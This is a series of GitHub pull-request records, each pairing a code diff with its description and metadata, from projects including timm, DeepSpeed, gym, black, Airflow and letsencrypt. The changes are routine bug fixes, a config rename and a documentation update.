F.scaled_dot_product_attention( q, k, v, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale @@ -1151,7 +1151,7 @@ def _cfg(url='', **kwargs): url='https://dl.fbaipublicfiles.com/dino/dino_vitbase8_pretrain/dino_vitbase8_pretrain.pth', hf_hub_id='timm/', mean=IMAGENET_DEFAULT_MEAN, std=IMAGENET_DEFAULT_STD, num_classes=0), - + # DINOv2 pretrained - https://arxiv.org/abs/2304.07193 (no classifier head, for fine-tune/features only) 'vit_small_patch14_dinov2.lvd142m': _cfg( url='https://dl.fbaipublicfiles.com/dinov2/dinov2_vits14/dinov2_vits14_pretrain.pth', @@ -1471,7 +1471,7 @@ def _cfg(url='', **kwargs): hf_hub_id='timm/', license='cc-by-nc-4.0', mean=IMAGENET_DEFAULT_MEAN, std=IMAGENET_DEFAULT_STD, num_classes=0), - + 'vit_huge_patch14_224_ijepa.in1k': _cfg( url='https://dl.fbaipublicfiles.com/ijepa/IN1K-vit.h.14-300e.pth.tar', # hf_hub_id='timm/', @@ -2080,7 +2080,7 @@ def vit_giant_patch14_dinov2(pretrained=False, **kwargs) -> VisionTransformer: # With SwiGLUPacked, we need to set hidden_features = 2 * 4096 = 8192 model_args = dict( - patch_size=14, embed_dim=1536, depth=40, num_heads=24, init_values=1e-5, + patch_size=14, embed_dim=1536, depth=40, num_heads=24, init_values=1e-5, mlp_ratio=2.66667 * 2, mlp_layer=SwiGLUPacked, img_size=518, act_layer=nn.SiLU ) model = _create_vision_transformer( diff --git a/timm/models/vision_transformer_relpos.py b/timm/models/vision_transformer_relpos.py index ea428587c1..2cd37cfe7e 100644 --- a/timm/models/vision_transformer_relpos.py +++ b/timm/models/vision_transformer_relpos.py @@ -71,7 +71,7 @@ def forward(self, x, shared_rel_pos: Optional[torch.Tensor] = None): x = torch.nn.functional.scaled_dot_product_attention( q, k, v, attn_mask=attn_bias, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale diff --git a/timm/models/vision_transformer_sam.py b/timm/models/vision_transformer_sam.py index 53c49b071e..59b354fb3d 100644 --- a/timm/models/vision_transformer_sam.py +++ b/timm/models/vision_transformer_sam.py @@ -168,7 +168,7 @@ def forward(self, x): x = torch.nn.functional.scaled_dot_product_attention( q, k, v, attn_mask=attn_bias, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale
This doesn't affect the current models since attn_dropout is 0
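A minimal sketch of the pattern applied throughout the diff (a simplified module, not the actual timm code): `nn.Dropout` is already a no-op in eval mode, but `F.scaled_dot_product_attention` takes a raw probability, so it has to be gated on `self.training` explicitly.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class FusedAttn(nn.Module):
    def __init__(self, attn_drop: float = 0.1):
        super().__init__()
        self.attn_drop = nn.Dropout(attn_drop)  # module form handles train/eval itself

    def forward(self, q, k, v):
        # The fused kernel takes a plain float, so dropout must be disabled
        # manually when the module is in eval mode.
        return F.scaled_dot_product_attention(
            q, k, v,
            dropout_p=self.attn_drop.p if self.training else 0.,
        )

attn = FusedAttn().eval()
q = k = v = torch.randn(1, 4, 8, 16)
out = attn(q, k, v)  # deterministic in eval mode regardless of attn_drop
```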
https://api.github.com/repos/huggingface/pytorch-image-models/pulls/1978
2023-10-03T19:00:11Z
2023-10-05T15:58:41Z
2023-10-05T15:58:41Z
2023-10-05T15:59:18Z
3,159
huggingface/pytorch-image-models
16,264
Fix potential random layout inconsistency issues in sparse attention modules
diff --git a/deepspeed/ops/sparse_attention/sparse_self_attention.py b/deepspeed/ops/sparse_attention/sparse_self_attention.py index 2e3156049e94..6e7d8905e0a8 100644 --- a/deepspeed/ops/sparse_attention/sparse_self_attention.py +++ b/deepspeed/ops/sparse_attention/sparse_self_attention.py @@ -5,6 +5,7 @@ import torch.nn as nn from torch.nn.functional import * import torch +from torch import distributed as dist from collections import namedtuple from deepspeed.ops.sparse_attention import MatMul, Softmax, SparsityConfig import sys @@ -22,29 +23,50 @@ def __init__( # SparsityConfig parameters needs to be set accordingly sparsity_config=SparsityConfig(num_heads=4), key_padding_mask_mode='add', - attn_mask_mode='mul'): + attn_mask_mode='mul', + max_seq_length=2048): """Initialize the sparse self attention layer. Arguments: sparsity_config: optional: this parameter determins sparsity pattern configuration; it is based on SparsityConfig class. key_padding_mask_mode: optional: a string determining if key padding mask needs to be added, `add`, or be multiplied, `mul`. attn_mask_mode: optional: a string determining if attention mask needs to be added, `add`, or be multiplied, `mul`. + max_seq_length: optional: the maximum sequence length this sparse attention module will be applied to; it controls the size of the master_layout. """ super().__init__() # sparsity information self.sparsity_config = sparsity_config + # initialize sparse layout and register as buffer + master_layout = self.sparsity_config.make_layout(max_seq_length) + self.register_buffer("master_layout", master_layout) + self._need_layout_synchronization = True + # mask modes self.key_padding_mask_mode = key_padding_mask_mode self.attn_mask_mode = attn_mask_mode ops = dict() + def get_layout(self, L): + # if layout is never synchronized across GPUs, broadcast the layout from global rank 0 + if self._need_layout_synchronization and dist.is_initialized(): + dist.broadcast(self.master_layout, src=0) + self._need_layout_synchronization = False + + if (L % self.sparsity_config.block != 0): + raise ValueError( + f'Sequence Length, {L}, needs to be dividable by Block size {self.sparsity_config.block}!' + ) + + num_blocks = L // self.sparsity_config.block + return self.master_layout[..., :num_blocks, :num_blocks].cpu() # layout needs to be a CPU tensor + # add to cache def get_ops(self, H, L): import sys if L not in SparseSelfAttention.ops: - sparsity_layout = self.sparsity_config.make_layout(L) + sparsity_layout = self.get_layout(L) sparse_dot_sdd_nt = MatMul(sparsity_layout, self.sparsity_config.block, 'sdd',
There are two changes made to the SparseSelfAttention module in this PR:

1) The SparseSelfAttention module now creates a "master_layout" upfront and registers it as a buffer. This saves us the need to create a new layout on the fly later (which can cause inconsistency if there's randomness in layout creation) and also makes it easy to save & load the layout from a checkpoint.
2) A broadcast of the layout is added at the beginning to ensure that different processes in distributed training have a consistent layout.

@arashashari
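A minimal sketch of the two fixes in isolation (a hypothetical `LayoutHolder` class, not the actual DeepSpeed module): build the layout once for the maximum sequence length, register it as a buffer so it travels with checkpoints, broadcast it from rank 0 on first use, and slice it per call.

```python
import torch
import torch.nn as nn
from torch import distributed as dist

class LayoutHolder(nn.Module):
    def __init__(self, make_layout, max_seq_length: int = 2048, block: int = 16):
        super().__init__()
        self.block = block
        # Build the layout once up front and register it as a buffer so it is
        # saved/loaded with checkpoints instead of being re-created on the fly.
        self.register_buffer("master_layout", make_layout(max_seq_length))
        self._need_layout_synchronization = True

    def get_layout(self, seq_len: int) -> torch.Tensor:
        # Broadcast rank 0's layout once so every process uses the same pattern,
        # even if make_layout involved randomness.
        if self._need_layout_synchronization and dist.is_initialized():
            dist.broadcast(self.master_layout, src=0)
            self._need_layout_synchronization = False
        if seq_len % self.block != 0:
            raise ValueError(f"Sequence length {seq_len} not divisible by block {self.block}")
        num_blocks = seq_len // self.block
        return self.master_layout[..., :num_blocks, :num_blocks].cpu()
```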
https://api.github.com/repos/microsoft/DeepSpeed/pulls/534
2020-11-18T00:54:26Z
2020-12-04T22:58:10Z
2020-12-04T22:58:10Z
2020-12-04T22:58:11Z
691
microsoft/DeepSpeed
10,170
Add documentation domain name announcement
diff --git a/README.md b/README.md index fca78cefe3b..0f7487d8c49 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,9 @@ [![pre-commit](https://img.shields.io/badge/pre--commit-enabled-brightgreen?logo=pre-commit&logoColor=white)](https://pre-commit.com/) [![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black) +## Important notice + +### Due to issues with the domain registration, the documentation has been moved to [https://www.gymlibrary.dev/](https://www.gymlibrary.dev/) as opposed to the old .ml address. + ## Gym Gym is an open source Python library for developing and comparing reinforcement learning algorithms by providing a standard API to communicate between learning algorithms and environments, as well as a standard set of environments compliant with that API. Since its release, Gym's API has become the field standard for doing this.
We need to actively make people aware of the address change to avoid potential security issues
https://api.github.com/repos/openai/gym/pulls/3039
2022-08-23T14:00:00Z
2022-08-23T15:10:15Z
2022-08-23T15:10:15Z
2022-08-23T15:10:15Z
241
openai/gym
5,229
Updating the CORS value for restcountries.com
diff --git a/README.md b/README.md index bcd6b8a4ba..77168a4320 100644 --- a/README.md +++ b/README.md @@ -669,7 +669,7 @@ API | Description | Auth | HTTPS | CORS | | [positionstack](https://positionstack.com/) | Forward & Reverse Batch Geocoding REST API | `apiKey` | Yes | Unknown | | [PostcodeData.nl](http://api.postcodedata.nl/v1/postcode/?postcode=1211EP&streetnumber=60&ref=domeinnaam.nl&type=json) | Provide geolocation data based on postcode for Dutch addresses | No | No | Unknown | | [Postcodes.io](https://postcodes.io) | Postcode lookup & Geolocation for the UK | No | Yes | Yes | -| [REST Countries](https://restcountries.com) | Get information about countries via a RESTful API | No | Yes | Unknown | +| [REST Countries](https://restcountries.com) | Get information about countries via a RESTful API | No | Yes | Yes | | [RoadGoat Cities](https://www.roadgoat.com/business/cities-api) | Cities content & photos API | `apiKey` | Yes | No | | [SpotSense](https://www.spotsense.io) | Add location based interactions to your mobile app | `apiKey` | Yes | Unknown | | [Uebermaps](https://uebermaps.com/api/v2) | Discover and share maps with friends | `apiKey` | Yes | Unknown |
It's just an update :)
https://api.github.com/repos/public-apis/public-apis/pulls/2073
2021-09-30T07:13:37Z
2021-09-30T07:49:05Z
2021-09-30T07:49:05Z
2021-09-30T07:49:05Z
337
public-apis/public-apis
35,444
A simpler fix to ensuring the messages view can render
diff --git a/website/src/components/FlaggableElement.tsx b/website/src/components/FlaggableElement.tsx index 9606f4259b..a7157c4a1b 100644 --- a/website/src/components/FlaggableElement.tsx +++ b/website/src/components/FlaggableElement.tsx @@ -36,13 +36,14 @@ interface textFlagLabels { export const FlaggableElement = (props) => { const [isEditing, setIsEditing] = useBoolean(); const flaggable_labels = props.flaggable_labels; - const TEXT_LABEL_FLAGS = flaggable_labels.valid_labels.map((valid_label) => { - return { - attributeName: valid_label.name, - labelText: valid_label.display_text, - additionalExplanation: valid_label.help_text, - }; - }); + const TEXT_LABEL_FLAGS = + flaggable_labels?.valid_labels?.map((valid_label) => { + return { + attributeName: valid_label.name, + labelText: valid_label.display_text, + additionalExplanation: valid_label.help_text, + }; + }) || []; const { trigger } = useSWRMutation("/api/set_label", poster, { onSuccess: () => { setIsEditing.off(); diff --git a/website/src/components/Messages/MessageTable.tsx b/website/src/components/Messages/MessageTable.tsx index bacd27f96d..872b79f17b 100644 --- a/website/src/components/Messages/MessageTable.tsx +++ b/website/src/components/Messages/MessageTable.tsx @@ -5,7 +5,7 @@ export function MessageTable({ messages, valid_labels }) { return ( <Stack divider={<StackDivider />} spacing="4"> {messages.map((item, idx) => ( - <MessageTableEntry item={item} idx={idx} key={item.message_id} valid_labels={valid_labels} /> + <MessageTableEntry item={item} idx={idx} key={item.message_id || item.id} valid_labels={valid_labels} /> ))} </Stack> );
https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/588
2023-01-10T08:53:28Z
2023-01-10T10:07:18Z
2023-01-10T10:07:18Z
2023-01-10T10:07:19Z
457
LAION-AI/Open-Assistant
37,523
Remove unnecessary use of async_add_job in openalpr_cloud
diff --git a/homeassistant/components/openalpr_cloud/image_processing.py b/homeassistant/components/openalpr_cloud/image_processing.py index 2c2807f5364f..525edc7da4be 100644 --- a/homeassistant/components/openalpr_cloud/image_processing.py +++ b/homeassistant/components/openalpr_cloud/image_processing.py @@ -142,8 +142,7 @@ def async_process_plates(self, plates: dict[str, float], vehicles: int) -> None: # Send events for i_plate in new_plates: - self.hass.async_add_job( - self.hass.bus.async_fire, + self.hass.bus.async_fire( EVENT_FOUND_PLATE, { ATTR_PLATE: i_plate,
## Proposed change

Remove unnecessary use of async_add_job in openalpr_cloud

## Type of change

- [ ] Dependency upgrade
- [ ] Bugfix (non-breaking change which fixes an issue)
- [ ] New integration (thank you!)
- [ ] New feature (which adds functionality to an existing integration)
- [ ] Deprecation (breaking change to happen in the future)
- [ ] Breaking change (fix/feature causing existing functionality to break)
- [x] Code quality improvements to existing code or addition of tests

## Additional information

- This PR fixes or closes issue: fixes #
- This PR is related to issue:
- Link to documentation pull request:

## Checklist

- [ ] The code change is tested and works locally.
- [ ] Local tests pass. **Your PR cannot be merged unless tests pass**
- [ ] There is no commented out code in this PR.
- [ ] I have followed the [development checklist][dev-checklist]
- [ ] I have followed the [perfect PR recommendations][perfect-pr]
- [ ] The code has been formatted using Ruff (`ruff format homeassistant tests`)
- [ ] Tests have been added to verify that the new code works.

If user exposed functionality or configuration variables are added/changed:

- [ ] Documentation added/updated for [www.home-assistant.io][docs-repository]

If the code communicates with devices, web services, or third-party tools:

- [ ] The [manifest file][manifest-docs] has all fields filled out correctly. Updated and included derived files by running: `python3 -m script.hassfest`.
- [ ] New or updated dependencies have been added to `requirements_all.txt`. Updated by running `python3 -m script.gen_requirements_all`.
- [ ] For the updated dependencies - a link to the changelog, or at minimum a diff between library versions is added to the PR description.
- [ ] Untested files have been added to `.coveragerc`.

To help with the load of incoming pull requests:

- [ ] I have reviewed two other [open pull requests][prs] in this repository.

[prs]: https://github.com/home-assistant/core/pulls?q=is%3Aopen+is%3Apr+-author%3A%40me+-draft%3Atrue+-label%3Awaiting-for-upstream+sort%3Acreated-desc+review%3Anone+-status%3Afailure
[dev-checklist]: https://developers.home-assistant.io/docs/development_checklist/
[manifest-docs]: https://developers.home-assistant.io/docs/creating_integration_manifest/
[quality-scale]: https://developers.home-assistant.io/docs/integration_quality_scale_index/
[docs-repository]: https://github.com/home-assistant/home-assistant.io
[perfect-pr]: https://developers.home-assistant.io/docs/review-process/#creating-the-perfect-pr
https://api.github.com/repos/home-assistant/core/pulls/113116
2024-03-12T00:14:59Z
2024-03-12T01:36:34Z
2024-03-12T01:36:34Z
2024-03-13T02:08:07Z
164
home-assistant/core
39,249
Fix unstable formatting on string split + % formatting (fixes #1595)
diff --git a/src/black/__init__.py b/src/black/__init__.py index 64a18655905..09b55b0938c 100644 --- a/src/black/__init__.py +++ b/src/black/__init__.py @@ -2668,9 +2668,9 @@ def rhs(line: Line, features: Collection[Feature]) -> Iterator[Line]: transformers = [ string_merge, string_paren_strip, + string_split, delimiter_split, standalone_comment_split, - string_split, string_paren_wrap, rhs, ] diff --git a/src/blib2to3/pgen2/pgen.py b/src/blib2to3/pgen2/pgen.py index 13ec51d1878..a685145933c 100644 --- a/src/blib2to3/pgen2/pgen.py +++ b/src/blib2to3/pgen2/pgen.py @@ -168,8 +168,7 @@ def calcfirst(self, name: Text) -> None: if symbol in inverse: raise ValueError( "rule %s is ambiguous; %s is in the first sets of %s as well" - " as %s" - % (name, symbol, label, inverse[symbol]) + " as %s" % (name, symbol, label, inverse[symbol]) ) inverse[symbol] = label self.first[name] = totalset diff --git a/tests/data/long_strings.py b/tests/data/long_strings.py index e1ed90f22de..151396b5239 100644 --- a/tests/data/long_strings.py +++ b/tests/data/long_strings.py @@ -380,8 +380,7 @@ def foo(): old_fmt_string1 = ( "While we are on the topic of %s, we should also note that old-style formatting" - " must also be preserved, since some %s still uses it." - % ("formatting", "code") + " must also be preserved, since some %s still uses it." % ("formatting", "code") ) old_fmt_string2 = "This is a %s %s %s %s" % ( @@ -448,8 +447,7 @@ def foo(): assert some_type_of_boolean_expression, ( "Followed by a really really really long string that is used to provide context to" - " the AssertionError exception, which uses dynamic string %s." - % "formatting" + " the AssertionError exception, which uses dynamic string %s." % "formatting" ) assert some_type_of_boolean_expression, ( diff --git a/tests/data/long_strings__regression.py b/tests/data/long_strings__regression.py index 044bb4a5deb..33bf14cfaa3 100644 --- a/tests/data/long_strings__regression.py +++ b/tests/data/long_strings__regression.py @@ -310,6 +310,13 @@ def who(self): passenger_association=passenger_association, ) +if __name__ == "__main__": + for i in range(4, 8): + cmd = ( + r"for pid in $(ps aux | grep paster | grep -v grep | grep '\-%d' | awk '{print $2}'); do kill $pid; done" + % (i) + ) + # output @@ -435,14 +442,12 @@ def foo(): func_call_where_string_arg_has_old_fmt_and_bad_parens( "A long string with {}. This string is so long that it is ridiculous. It can't fit" - " on one line at alllll." - % "formatting", + " on one line at alllll." % "formatting", ) func_call_where_string_arg_has_old_fmt_and_bad_parens( "A long string with {}. This {} is so long that it is ridiculous. It can't fit on" - " one line at alllll." - % ("formatting", "string"), + " one line at alllll." % ("formatting", "string"), ) @@ -702,3 +707,11 @@ def who(self): passenger_association=passenger_association, ) ) + + +if __name__ == "__main__": + for i in range(4, 8): + cmd = ( + r"for pid in $(ps aux | grep paster | grep -v grep | grep '\-%d' | awk" + r" '{print $2}'); do kill $pid; done" % (i) + )
Fixes #1595.
https://api.github.com/repos/psf/black/pulls/1680
2020-09-05T17:24:23Z
2020-09-06T00:24:01Z
2020-09-06T00:24:01Z
2020-09-06T00:24:06Z
1,019
psf/black
23,936
Updating Reference section hyperlinks
diff --git a/CSV Injection/README.md b/CSV Injection/README.md index 6c1236f9b4..d631791043 100644 --- a/CSV Injection/README.md +++ b/CSV Injection/README.md @@ -53,11 +53,11 @@ Any formula can be started with ## References -* [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection) -* [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection) -* [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/) +* [OWASP - CSV Excel Macro Injection](https://owasp.org/www-community/attacks/CSV_Injection) +* [Google Bug Hunter University - CSV Excel formula injection](https://bughunters.google.com/learn/invalid-reports/google-products/4965108570390528/csv-formula-injection) * [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/) * [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/) -* [CSV Injection -> Meterpreter on Pornhub - @ZephrFish Andy](https://news.webamooz.com/wp-content/uploads/bot/offsecmag/147.pdf) * [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html) * [Three New DDE Obfuscation Methods](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation) +* [Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection](https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection) +
https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/527
2022-08-15T05:54:10Z
2022-08-15T09:40:15Z
2022-08-15T09:40:15Z
2022-10-21T16:00:07Z
469
swisskyrepo/PayloadsAllTheThings
8,724
Rename ``processor_poll_interval`` to ``scheduler_idle_sleep_time``
diff --git a/UPDATING.md b/UPDATING.md index 1c291d3d90114..047a9202e7c98 100644 --- a/UPDATING.md +++ b/UPDATING.md @@ -177,6 +177,27 @@ with DAG(dag_id="task_concurrency_example"): BashOperator(task_id="t1", max_active_tis_per_dag=2, bash_command="echo Hi") ``` +### `processor_poll_interval` config have been renamed to `scheduler_idle_sleep_time` + +`[scheduler] processor_poll_interval` setting in `airflow.cfg` has been renamed to `[scheduler] scheduler_idle_sleep_time` +for better understanding. + +It controls the 'time to sleep' at the end of the Scheduler loop if nothing was scheduled inside `SchedulerJob`. + +**Before**: + +```ini +[scheduler] +processor_poll_interval = 16 +``` + +**Now**: + +```ini +[scheduler] +scheduler_idle_sleep_time = 16 +``` + ### Marking success/failed automatically clears failed downstream tasks When marking a task success/failed in Graph View, its downstream tasks that are in failed/upstream_failed state are automatically cleared. diff --git a/airflow/config_templates/config.yml b/airflow/config_templates/config.yml index 4c7cfa89dbee0..56a36efd747c2 100644 --- a/airflow/config_templates/config.yml +++ b/airflow/config_templates/config.yml @@ -1739,13 +1739,12 @@ type: string example: ~ default: "-1" - - name: processor_poll_interval + - name: scheduler_idle_sleep_time description: | Controls how long the scheduler will sleep between loops, but if there was nothing to do in the loop. i.e. if it scheduled something then it will start the next loop - iteration straight away. This parameter is badly named (historical reasons) and it will be - renamed in the future with deprecation of the current name. - version_added: 1.10.6 + iteration straight away. + version_added: 2.2.0 type: string example: ~ default: "1" diff --git a/airflow/config_templates/default_airflow.cfg b/airflow/config_templates/default_airflow.cfg index 464d5f1ed62b7..54315ca470775 100644 --- a/airflow/config_templates/default_airflow.cfg +++ b/airflow/config_templates/default_airflow.cfg @@ -870,9 +870,8 @@ num_runs = -1 # Controls how long the scheduler will sleep between loops, but if there was nothing to do # in the loop. i.e. if it scheduled something then it will start the next loop -# iteration straight away. This parameter is badly named (historical reasons) and it will be -# renamed in the future with deprecation of the current name. -processor_poll_interval = 1 +# iteration straight away. +scheduler_idle_sleep_time = 1 # Number of seconds after which a DAG file is parsed. The DAG file is parsed every # ``min_file_process_interval`` number of seconds. 
Updates to DAGs are reflected after diff --git a/airflow/configuration.py b/airflow/configuration.py index 2e3e5366c3365..e120b26012200 100644 --- a/airflow/configuration.py +++ b/airflow/configuration.py @@ -167,6 +167,7 @@ class AirflowConfigParser(ConfigParser): ('metrics', 'statsd_datadog_tags'): ('scheduler', 'statsd_datadog_tags', '2.0.0'), ('metrics', 'statsd_custom_client_path'): ('scheduler', 'statsd_custom_client_path', '2.0.0'), ('scheduler', 'parsing_processes'): ('scheduler', 'max_threads', '1.10.14'), + ('scheduler', 'scheduler_idle_sleep_time'): ('scheduler', 'processor_poll_interval', '2.2.0'), ('operators', 'default_queue'): ('celery', 'default_queue', '2.1.0'), ('core', 'hide_sensitive_var_conn_fields'): ('admin', 'hide_sensitive_variable_fields', '2.1.0'), ('core', 'sensitive_var_conn_names'): ('admin', 'sensitive_variable_fields', '2.1.0'), diff --git a/airflow/jobs/scheduler_job.py b/airflow/jobs/scheduler_job.py index a92040b5ab194..d0c016c7ca869 100644 --- a/airflow/jobs/scheduler_job.py +++ b/airflow/jobs/scheduler_job.py @@ -24,6 +24,7 @@ import signal import sys import time +import warnings from collections import defaultdict from datetime import timedelta from typing import Collection, DefaultDict, Dict, List, Optional, Tuple @@ -86,9 +87,9 @@ class SchedulerJob(BaseJob): :param num_times_parse_dags: The number of times to try to parse each DAG file. -1 for unlimited times. :type num_times_parse_dags: int - :param processor_poll_interval: The number of seconds to wait between + :param scheduler_idle_sleep_time: The number of seconds to wait between polls of running processors - :type processor_poll_interval: int + :type scheduler_idle_sleep_time: int :param do_pickle: once a DAG object is obtained by executing the Python file, whether to serialize the DAG object to the DB :type do_pickle: bool @@ -104,9 +105,10 @@ def __init__( subdir: str = settings.DAGS_FOLDER, num_runs: int = conf.getint('scheduler', 'num_runs'), num_times_parse_dags: int = -1, - processor_poll_interval: float = conf.getfloat('scheduler', 'processor_poll_interval'), + scheduler_idle_sleep_time: float = conf.getfloat('scheduler', 'scheduler_idle_sleep_time'), do_pickle: bool = False, log: logging.Logger = None, + processor_poll_interval: Optional[float] = None, *args, **kwargs, ): @@ -117,7 +119,16 @@ def __init__( # number of times. This is only to support testing, and isn't something a user is likely to want to # configure -- they'll want num_runs self.num_times_parse_dags = num_times_parse_dags - self._processor_poll_interval = processor_poll_interval + if processor_poll_interval: + # TODO: Remove in Airflow 3.0 + warnings.warn( + "The 'processor_poll_interval' parameter is deprecated. " + "Please use 'scheduler_idle_sleep_time'.", + DeprecationWarning, + stacklevel=2, + ) + scheduler_idle_sleep_time = processor_poll_interval + self._scheduler_idle_sleep_time = scheduler_idle_sleep_time self.do_pickle = do_pickle super().__init__(*args, **kwargs) @@ -676,7 +687,7 @@ def _run_scheduler_loop(self) -> None: # If the scheduler is doing things, don't sleep. 
This means when there is work to do, the # scheduler will run "as quick as possible", but when it's stopped, it can sleep, dropping CPU # usage when "idle" - time.sleep(min(self._processor_poll_interval, next_event)) + time.sleep(min(self._scheduler_idle_sleep_time, next_event)) if loop_count >= self.num_runs > 0: self.log.info( diff --git a/docs/apache-airflow/best-practices.rst b/docs/apache-airflow/best-practices.rst index 514b77b6761d9..4e6910923da9b 100644 --- a/docs/apache-airflow/best-practices.rst +++ b/docs/apache-airflow/best-practices.rst @@ -314,7 +314,7 @@ In case you see long delays between updating it and the time it is ready to be t at the following configuration parameters and fine tune them according your needs (see details of each parameter by following the links): -* :ref:`config:scheduler__processor_poll_interval` +* :ref:`config:scheduler__scheduler_idle_sleep_time` * :ref:`config:scheduler__min_file_process_interval` * :ref:`config:scheduler__dag_dir_list_interval` * :ref:`config:scheduler__parsing_processes` diff --git a/docs/apache-airflow/concepts/scheduler.rst b/docs/apache-airflow/concepts/scheduler.rst index 7361a4c661ba9..fda92c95eb806 100644 --- a/docs/apache-airflow/concepts/scheduler.rst +++ b/docs/apache-airflow/concepts/scheduler.rst @@ -366,7 +366,7 @@ However you can also look at other non-performance-related scheduler configurati The scheduler can run multiple processes in parallel to parse DAG files. This defines how many processes will run. -- :ref:`config:scheduler__processor_poll_interval` +- :ref:`config:scheduler__scheduler_idle_sleep_time` Controls how long the scheduler will sleep between loops, but if there was nothing to do in the loop. i.e. if it scheduled something then it will start the next loop iteration straight away. This parameter is badly named (historical reasons) and it will be
`[scheduler] processor_poll_interval` setting in `airflow.cfg` has been renamed to `[scheduler] scheduler_idle_sleep_time` for better understanding.
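The diff keeps the old `processor_poll_interval` keyword on `SchedulerJob.__init__` as a deprecated alias. A minimal standalone sketch of that rename pattern (hypothetical `make_scheduler` function, not Airflow code; the real code checks truthiness rather than `is not None`):

```python
import warnings
from typing import Optional

def make_scheduler(
    scheduler_idle_sleep_time: float = 1.0,
    processor_poll_interval: Optional[float] = None,  # deprecated alias
) -> float:
    if processor_poll_interval is not None:
        warnings.warn(
            "The 'processor_poll_interval' parameter is deprecated. "
            "Please use 'scheduler_idle_sleep_time'.",
            DeprecationWarning,
            stacklevel=2,
        )
        scheduler_idle_sleep_time = processor_poll_interval
    return scheduler_idle_sleep_time

assert make_scheduler(processor_poll_interval=16) == 16  # old name still honored
```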
https://api.github.com/repos/apache/airflow/pulls/18704
2021-10-04T12:43:47Z
2021-10-05T15:55:00Z
2021-10-05T15:54:59Z
2021-10-05T15:55:04Z
2,092
apache/airflow
14,114
Abstract the remaining OS specific constants from the code
diff --git a/letsencrypt-apache/letsencrypt_apache/configurator.py b/letsencrypt-apache/letsencrypt_apache/configurator.py
index 6c6685257ed..836d7713577 100644
--- a/letsencrypt-apache/letsencrypt_apache/configurator.py
+++ b/letsencrypt-apache/letsencrypt_apache/configurator.py
@@ -86,10 +86,6 @@ class ApacheConfigurator(augeas_configurator.AugeasConfigurator):
 
     @classmethod
     def add_parser_arguments(cls, add):
-        add("ctl", default=constants.os_constant("ctl"),
-            help="Path to the 'apache2ctl' binary, used for 'configtest', "
-            "retrieving the Apache2 version number, and initialization "
-            "parameters.")
         add("enmod", default=constants.os_constant("enmod"),
             help="Path to the Apache 'a2enmod' binary.")
         add("dismod", default=constants.os_constant("dismod"),
@@ -148,10 +144,8 @@ def prepare(self):
 
         """
         # Verify Apache is installed
-        for exe in (self.conf("ctl"), self.conf("enmod"), self.conf("dismod")):
-            if exe is not None:
-                if not le_util.exe_exists(exe):
-                    raise errors.NoInstallationError
+        if not le_util.exe_exists(constants.os_constant("restart_cmd")[0]):
+            raise errors.NoInstallationError
 
         # Make sure configuration is valid
         self.config_test()
@@ -165,7 +159,7 @@ def prepare(self):
 
         self.parser = parser.ApacheParser(
             self.aug, self.conf("server-root"), self.conf("vhost-root"),
-            self.conf("ctl"), self.version)
+            self.version)
 
         # Check for errors in parsing files with Augeas
         self.check_parsing_errors("httpd.aug")
@@ -1277,7 +1271,7 @@ def enable_mod(self, mod_name, temp=False):
         # Modules can enable additional config files. Variables may be defined
         # within these new configuration sections.
         # Reload is not necessary as DUMP_RUN_CFG uses latest config.
-        self.parser.update_runtime_variables(self.conf("ctl"))
+        self.parser.update_runtime_variables()
 
     def _add_parser_mod(self, mod_name):
         """Shortcut for updating parser modules."""
@@ -1315,7 +1309,7 @@ def _reload(self):
 
         """
        try:
-            le_util.run_script([self.conf("ctl"), "graceful"])
+            le_util.run_script(constants.os_constant("restart_cmd"))
         except errors.SubprocessError as err:
             raise errors.MisconfigurationError(str(err))
 
@@ -1326,7 +1320,7 @@ def config_test(self):  # pylint: disable=no-self-use
 
         """
         try:
-            le_util.run_script([self.conf("ctl"), "configtest"])
+            le_util.run_script(constants.os_constant("conftest_cmd"))
         except errors.SubprocessError as err:
             raise errors.MisconfigurationError(str(err))
 
@@ -1346,7 +1340,8 @@ def get_version(self):
                 constants.os_constant("version_cmd"))
         except errors.SubprocessError:
             raise errors.PluginError(
-                "Unable to run %s -v" % self.conf("ctl"))
+                "Unable to run %s -v" %
+                constants.os_constant("version_cmd"))
 
         regex = re.compile(r"Apache/([0-9\.]*)", re.IGNORECASE)
         matches = regex.findall(stdout)
diff --git a/letsencrypt-apache/letsencrypt_apache/constants.py b/letsencrypt-apache/letsencrypt_apache/constants.py
index f8712c247c4..8ac88b197d3 100644
--- a/letsencrypt-apache/letsencrypt_apache/constants.py
+++ b/letsencrypt-apache/letsencrypt_apache/constants.py
@@ -6,9 +6,11 @@
 CLI_DEFAULTS_DEBIAN = dict(
     server_root="/etc/apache2",
     vhost_root="/etc/apache2/sites-available",
-    ctl="apache2ctl",
+    vhost_files="*",
     version_cmd=['apache2ctl', '-v'],
     define_cmd=['apache2ctl', '-t', '-D', 'DUMP_RUN_CFG'],
+    restart_cmd=['apache2ctl', 'graceful'],
+    conftest_cmd=['apache2ctl', 'configtest'],
     enmod="a2enmod",
     dismod="a2dismod",
     le_vhost_ext="-le-ssl.conf",
@@ -19,9 +21,11 @@
 CLI_DEFAULTS_CENTOS = dict(
     server_root="/etc/httpd",
     vhost_root="/etc/httpd/conf.d",
-    ctl="apachectl",
